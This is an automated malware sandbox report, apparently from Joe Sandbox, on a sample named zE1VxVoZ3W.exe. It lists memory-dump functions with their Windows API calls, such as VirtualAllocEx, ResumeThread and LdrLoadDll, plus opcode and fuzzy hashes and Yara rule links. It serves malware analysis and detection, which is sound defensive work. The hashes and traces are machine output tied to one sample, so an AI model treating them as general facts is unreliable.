Function 07735020 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07735096

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 02d2b434285bfcf33a04c4b91133ec566d0ddecb9a6433808c857493c7b3d8da
Instruction ID: 9d0eeab495cb3142e1e62e691787e6bcb8eb61d7cba8bcdaf337f2e4697360ff
Opcode Fuzzy Hash: 02d2b434285bfcf33a04c4b91133ec566d0ddecb9a6433808c857493c7b3d8da
Instruction Fuzzy Hash: D721B8728043489FDF21CFAAC845BDEBFF5AF89310F24881AE415AB251C7769411CBA0

Function 07734E98 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07734F02

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5951a891f6d46d97ae52d02752a1a5c5915a37880417df7edc5279bf59d61d91
Instruction ID: c5a377a29dea8a45c03116b8131289abb50602b1df9ed3f075fcb418a0d3ad08
Opcode Fuzzy Hash: 5951a891f6d46d97ae52d02752a1a5c5915a37880417df7edc5279bf59d61d91
Instruction Fuzzy Hash: 01116DB19003498FDB24DFAAC4457EFFBF5AF88320F14841AD419A7640C7795941CFA5

Function 07735028 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07735096

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b40baa03c6aad441cbaa19f3ca6bcc0b2ce3d6644910c362ba05dd6fa2f070ed
Instruction ID: 77d466b7c24a7d5a4d01524339015d43f454941403041749ca69d1d2b258a06a
Opcode Fuzzy Hash: b40baa03c6aad441cbaa19f3ca6bcc0b2ce3d6644910c362ba05dd6fa2f070ed
Instruction Fuzzy Hash: 2C1126728003499FDB20DFAAC844BDEBBF5AF88310F14881AE519A7250C7769550CFA4

Function 07734EA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07734F02

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 62765ee543bfe3702e1b770f8c6b50f6b13bca07095952a70ec823c75dedd80e
Instruction ID: df93763937ba699a80b263b4d3711c5dd5b8795c46700aaec80f70a785ea8dc6
Opcode Fuzzy Hash: 62765ee543bfe3702e1b770f8c6b50f6b13bca07095952a70ec823c75dedd80e
Instruction Fuzzy Hash: 46113AB19003498FDB24DFAAC4457EEFBF4AF88314F14881AD419A7240C7796540CFA5

Function 07736194 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 077395DD

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 218c53ccb9cd28798956e9c80b3b17d9ab4545dda6b7071ed990adbadfe4c3d1
Instruction ID: 5d86d1cb376a8dcd7a0879ad057bec4f23226ede5f064fc233fbd7e7fe0dbfe8
Opcode Fuzzy Hash: 218c53ccb9cd28798956e9c80b3b17d9ab4545dda6b7071ed990adbadfe4c3d1
Instruction Fuzzy Hash: 6111F5B59003499FDB10DF9AC884BDEBBF8EB48314F10841AE959A7241D3B5A944CFA5

Function 016BB058 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 016BB0BE

Memory Dump Source

Source File: 00000000.00000002.1625292991.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_zE1VxVoZ3W.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: abadc7aa8f1c9554645e7e3009c94c8c8d6596e12912eca0d4c149927f72b852
Instruction ID: 68e5204f361ae45633a878654aea65d9f7ecf0a1e20c7f534a270b6613535f06
Opcode Fuzzy Hash: abadc7aa8f1c9554645e7e3009c94c8c8d6596e12912eca0d4c149927f72b852
Instruction Fuzzy Hash: AC110FB5C002498FDB20CF9AC884BDEFBF4AF88214F10841AD929A7640D379A545CFA1

Function 0773957A Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 077395DD

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d2ed24b99ef8ec89c8192aba1387a28ebf5a0778275c50e68551dc102a275f0b
Instruction ID: 71284671c3e8ff5f45507befd9a26f3d40e80673506a772bcfc3ba68c096267c
Opcode Fuzzy Hash: d2ed24b99ef8ec89c8192aba1387a28ebf5a0778275c50e68551dc102a275f0b
Instruction Fuzzy Hash: 3E11F5B58003499FDB10CF9AD885BDEFFF8EB48324F10841AE518A7640C3B5A584CFA5

Function 0156D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1624972082.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_156d000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22a1e0aeda7353b57c4fd40440b0807a7f97bda4e8122c3fbb0d8d0cd73c5d93
Instruction ID: 13b009582c2efc3f0b28f38ae49d768e0cbc1170b646520f1f53c760746a89e2
Opcode Fuzzy Hash: 22a1e0aeda7353b57c4fd40440b0807a7f97bda4e8122c3fbb0d8d0cd73c5d93
Instruction Fuzzy Hash: F0214871604244DFDB01DF54C9C0B5ABBB9FB88315F20C968E8490F246C376E856CBE2

Function 0156D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1624972082.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_156d000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75419256dffccec7efc9e8d0531274cc0093966daea58bd718ef7bb2e17d939e
Instruction ID: ebac1ede5b926d594bce347e2524b0b9e8f42cc96e676456a430bda0b6b257c5
Opcode Fuzzy Hash: 75419256dffccec7efc9e8d0531274cc0093966daea58bd718ef7bb2e17d939e
Instruction Fuzzy Hash: 2F212171604240EFDB01DF54C8C0B2ABBB9FB98318F20C969E8890F656C336D456CAE2

Function 0157D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625034211.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157d000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ba0d7b16a3972cef664be635881946c4d1b5bf925e30b029430ac666bb7448c
Instruction ID: 57152560997bcc3e40aedb1815177a286f2326bd99bfcdb5592b434b5e884879
Opcode Fuzzy Hash: 2ba0d7b16a3972cef664be635881946c4d1b5bf925e30b029430ac666bb7448c
Instruction Fuzzy Hash: 5621B071604244AFDB05DF94E9C1B2ABBB5FF84224F24C9ADE94A4F252C33AD447CA61

Function 0157D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625034211.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157d000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33285e989926a7a2a072596c0a0fcec345fc91eea99d9f12ef4fcb15794cddda
Instruction ID: 042aeb9623b4e0aa46234b83b4478641ae3d8d1441e4c5cc9e8d43949b75c76c
Opcode Fuzzy Hash: 33285e989926a7a2a072596c0a0fcec345fc91eea99d9f12ef4fcb15794cddda
Instruction Fuzzy Hash: 3A210075604200EFDB16DF64E984B26BBB1FF84314F20C96DE80A0F242D33AD447CA62

Function 0157D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625034211.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157d000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df06b72ab8538eb9075b4ca0223301b3c03063cf5afc2d184b12b420569aa946
Instruction ID: cbb1d104dfdfcb3280e8532041b2b58e903733db7e2d9bc1294e2215cf77b495
Opcode Fuzzy Hash: df06b72ab8538eb9075b4ca0223301b3c03063cf5afc2d184b12b420569aa946
Instruction Fuzzy Hash: AC216A755093808FCB03CF24D994B15BF71BF46214F28C5EAD8498F6A7C33A980ACB62

Function 0156D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1624972082.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_156d000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction ID: 129db17bf8b40fca1a57a1ca2a1b734ea9bb21a33ff5a602b8e587b1daed36e8
Opcode Fuzzy Hash: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction Fuzzy Hash: 5511CD72504240CFCB02CF44D5C4B5ABF71FB84224F2486A9D8490F656C33AE85ACBA1

Function 0156D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1624972082.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_156d000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction ID: 9684aa70d2b2fb3906771392d45c04670da3a8d999e989ba6eca0616a05e254d
Opcode Fuzzy Hash: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction Fuzzy Hash: 7511AF76504280CFCB16CF54D5C4B1ABF71FB94318F24C6A9D8490FA56C33AD45ACBA1

Function 0157D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625034211.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157d000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction ID: ee94cb97c777d7e226c7a4058edd9a6d1bcb6e15198116ee2666c2248dbb624e
Opcode Fuzzy Hash: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction Fuzzy Hash: 36118B75504280DFDB16CF54D5C4B19BFB1FF84228F28C6A9D8494F696C33AD44ACB61

Function 0156D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1624972082.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_156d000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42c159eefd1365464247b0b6c382b19409f6fd29454ce7e894259f1c52bb83e0
Instruction ID: 50bd5412b2eb2e4534d6eabcd9f24f6515f57956641e90967fa4308e851fad17
Opcode Fuzzy Hash: 42c159eefd1365464247b0b6c382b19409f6fd29454ce7e894259f1c52bb83e0
Instruction Fuzzy Hash: 620188715043809AE7105E55CD84B66BFECEF41624F188D19DD494F182D67D9441C6B2

Function 0156D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1624972082.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_156d000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b506fa6d898af7f394ec84e8ab6fa70385c69a2bbe4f83b082194906044cf412
Instruction ID: 65193f89cb78127ce8cebcc9dc8e41c3132b36c931cf25c97200ff3177467cc1
Opcode Fuzzy Hash: b506fa6d898af7f394ec84e8ab6fa70385c69a2bbe4f83b082194906044cf412
Instruction Fuzzy Hash: 02F06271508384AEE7118E5ADC84B66FFECEB41634F18C45AED484F287C67D9844CAB1

Non-executed Functions

Function 07734678 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

X,p, xrefs: 077346D3

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: X,p
API String ID: 0-549741804
Opcode ID: 3abde2e7502538ea496deceef809879f32b25a607d39c7549870480b448ea984
Instruction ID: 95eacc85f9985fad38fcfb24d8a0984b62cd0c96306fbfeb4ab2252cc618e4ad
Opcode Fuzzy Hash: 3abde2e7502538ea496deceef809879f32b25a607d39c7549870480b448ea984
Instruction Fuzzy Hash: 85E1D8B4E002598FDB18CFA9C580AAEBBF2FF89345F248169D414AB356D730AD41CF65

Function 07734668 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

X,p, xrefs: 077346D3

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID: X,p
API String ID: 0-549741804
Opcode ID: 5b67e718fdda0ab2e9d7168d3724fe981af6235130f2e2596dc8e20bcc6de62e
Instruction ID: 76046b7e16f5b1d6297e035a1fc958238671031476ce2faaff59f70dd0a42c76
Opcode Fuzzy Hash: 5b67e718fdda0ab2e9d7168d3724fe981af6235130f2e2596dc8e20bcc6de62e
Instruction Fuzzy Hash: 9051FAB4E002598FDB18CFA9C5805AEBBF2FF89305F2481AAD418AB316D7319D41CF65

Function 07732608 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc38041836bcc3b5892de32db1eb5be01dcc38e66562733cf30cf3b356977e07
Instruction ID: ecf7454d91689994c463ba412686d43895d989859e2f5c18e85698cbf193531a
Opcode Fuzzy Hash: fc38041836bcc3b5892de32db1eb5be01dcc38e66562733cf30cf3b356977e07
Instruction Fuzzy Hash: E8E1E8B4E002198FDB14CFA9C580AAEBBF2FF89305F248169D554AB356D731AD41CFA4

Function 07732A40 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc6cfa6557216346e4823f0a9286f4c47c9f2e213cd1b6ef3fffeabb1d99d8
Instruction ID: 7d3049191ae55c6204e8fd021a258283de95e15fa5a5e4a6cb34bd6c60e81fc2
Opcode Fuzzy Hash: f6fc6cfa6557216346e4823f0a9286f4c47c9f2e213cd1b6ef3fffeabb1d99d8
Instruction Fuzzy Hash: 5EE1D6B4E006198FDB14DFA9C581AAEBBF2FF89305F248169D418AB356D730AD41CF64

Function 07734240 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76efde82c97e4a015e514bc9e5335195d69ad6d7e857f987286dbd31edda23b
Instruction ID: 6a8ca7c07012fa53c6f36244b20a6ce3473c07e8c84aec23a4cd2e09fa4bac96
Opcode Fuzzy Hash: c76efde82c97e4a015e514bc9e5335195d69ad6d7e857f987286dbd31edda23b
Instruction Fuzzy Hash: 81E1E9B4E002598FDB18CFA9C5809AEBBF2FF89345F2481A9D414AB356D734AD41CF64

Function 077321D0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d79edf66c57c6530a5eab62796099f2219840ab8ec2fdf2e18346ea5e3094bfb
Instruction ID: 50133f2e5d6267c4ffdd4cd0536207cea9e9c60d9454fa73f8b847b7ccaef6ab
Opcode Fuzzy Hash: d79edf66c57c6530a5eab62796099f2219840ab8ec2fdf2e18346ea5e3094bfb
Instruction Fuzzy Hash: 1BE1E8B4E002198FDB14CF99C580AAEBBF2FF89305F2481A9D415AB356D735AD41CF64

Function 094D0FE8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1660338925.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_94d0000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6260876282b65caacd0ad165c16fb8009a7c889804d403c4d4f20863d4f2a248
Instruction ID: 94ba7ab1c88d473cd437c2d2f0a82d7fbb0b539e668537d64e7860ec4166b731
Opcode Fuzzy Hash: 6260876282b65caacd0ad165c16fb8009a7c889804d403c4d4f20863d4f2a248
Instruction Fuzzy Hash: 1CD1F631C2075ADBDB10EB64D950A99B3B1FFD6300F21C79AD4093B220EBB06AD5CB91

Function 094D0FF8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1660338925.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_94d0000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c384c43584679101c7df01199740cc2c6c64ea7e6040f81931ff89c85bd0e18
Instruction ID: 8fbc240f1a34552bbf9600d67fd6927ead699b3b5ce89e119d2e5b92240d3042
Opcode Fuzzy Hash: 3c384c43584679101c7df01199740cc2c6c64ea7e6040f81931ff89c85bd0e18
Instruction Fuzzy Hash: 26D1F63192075ADBDB10EB64D954A99B3B1FFD6300F21C79AD4093B220EFB06AD5CB91

Function 016BD424 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1625292991.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5e79d90ec5240da94778233c377999ca271be85dfd73c649e1f975248f5c511
Instruction ID: 85ae04fcbce860ddae32a01db4f2182fe1a1c7a45f5cfd32d6e933420f7c0bea
Opcode Fuzzy Hash: f5e79d90ec5240da94778233c377999ca271be85dfd73c649e1f975248f5c511
Instruction Fuzzy Hash: B5A17F32E002169FCF15DFB8CC805DEBBB2FF85301B1585AAE905AB265EB71E955CB40

Function 07732A30 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1658173461.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_zE1VxVoZ3W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e42067affc4fb5afa61489417ba90fe2a9835fe1e68b847686a9e0b3421ad3
Instruction ID: 6db1d8c7129140839688842d036cac2b8ad36dc4dc9beb3d076d2dba2e993b59
Opcode Fuzzy Hash: 53e42067affc4fb5afa61489417ba90fe2a9835fe1e68b847686a9e0b3421ad3
Instruction Fuzzy Hash: 3D512AB1E002198FDB14CFA9C5815AEFBF2FF8A300F2481A9D418AB216D7309D42CF64

Analysis Process: zE1VxVoZ3W.exePID: 5972, Parent PID: 5932COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	5.4%
Signature Coverage:	8.5%
Total number of Nodes:	130
Total number of Limit Nodes:	9

Executed Functions

Function 00417C03 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C75

Memory Dump Source

Source File: 00000009.00000002.1993276336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_zE1VxVoZ3W.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
Instruction ID: 3bf483506c8ef04f75eea1edb534f6bc52cc7f42fac2df155848acd78f935126
Opcode Fuzzy Hash: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
Instruction Fuzzy Hash: E30171B5E0020DABDF10DBE5DC42FDEB3789B54308F4041AAE90897240F635EB488B95

Function 0042CAE3 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CB17

Memory Dump Source

Source File: 00000009.00000002.1993276336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_zE1VxVoZ3W.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 97dec5b74be4aedb3c1181ed5c32ed08843b18dee4068410edbffac1a536c693
Instruction ID: 325a8a8a8a777bd927e10bfc55ad226b596583c8cf2ef6e5668433069c3dc898
Opcode Fuzzy Hash: 97dec5b74be4aedb3c1181ed5c32ed08843b18dee4068410edbffac1a536c693
Instruction Fuzzy Hash: 66E08672211A147BD610EA5AEC41FD7776CDFC5714F404419FA1867281C67579118BF4

Function 010935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010935CA

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1d64c7ee6e7c99841a3f853d22680382b356cfb870881920ac64ece676ebd115
Instruction ID: d5bbee6b1d4b11d326a95712044f73b488a55cba609acddc10d040620d6153e1
Opcode Fuzzy Hash: 1d64c7ee6e7c99841a3f853d22680382b356cfb870881920ac64ece676ebd115
Instruction Fuzzy Hash: 0E900271B0550402E10071D88524706100597E0202FA5C412A0824568DC7958A5166A2

Function 01092B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01092B6A

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 03c8ec45442551ed11e10db14dfd38268ea1c01d4ecbf635949b1bdce23b7145
Instruction ID: 701cc439648640bcd50dbb1bccccd87c5ea09a79e74f4f0cfb8fa84be18d315e
Opcode Fuzzy Hash: 03c8ec45442551ed11e10db14dfd38268ea1c01d4ecbf635949b1bdce23b7145
Instruction Fuzzy Hash: 319002A170240003510571D88424616400A97F0202B95C022E1414590DC52589916225

Function 01092DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01092DFA

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f23dffdd4801eff1eb6134a9b067749a5be8b6def2016637fddc8b534bd90381
Instruction ID: 33e2c73397ced17bc0443409e8b61743bceb7efe6e037393c876dc5671798c28
Opcode Fuzzy Hash: f23dffdd4801eff1eb6134a9b067749a5be8b6def2016637fddc8b534bd90381
Instruction Fuzzy Hash: E390027170140413E11171D88514707000997E0242FD5C413A0824558DD6568A52A221

Function 01092C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01092C7A

Memory Dump Source

Source File: 00000009.00000002.1994916242.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1020000_zE1VxVoZ3W.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 453d20a1506ceace8b23fd9f033838ba5677778f477f03a3034f445e98c469bd
Instruction ID: d855d5e1fb7fcf5fe447174ceef7af2c77387e77e4de9dc82683c18180f7d290
Opcode Fuzzy Hash: 453d20a1506ceace8b23fd9f033838ba5677778f477f03a3034f445e98c469bd
Instruction Fuzzy Hash: CB90027170148802E11071D8C41474A000597E0302F99C412A4824658DC69589917221

Function 0041444B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(62MfV68M,00000111,00000000,00000000), ref: 004144CA

Strings

62MfV68M, xrefs: 004144D1, 004144D4
62MfV68M, xrefs: 004144BF, 004144C9, 004144DA

Memory Dump Source

Source File: 00000009.00000002.1993276336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_zE1VxVoZ3W.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 62MfV68M$62MfV68M
API String ID: 1836367815-526971814
Opcode ID: 8a9a2e564dfc954b28b181a8f7326500493437356dd6eac515674658e2b06ef8
Instruction ID: 22fe800f0282aa748b36965028d586dc3cd38077be04e506458ed1240d3a8d28
Opcode Fuzzy Hash: 8a9a2e564dfc954b28b181a8f7326500493437356dd6eac515674658e2b06ef8
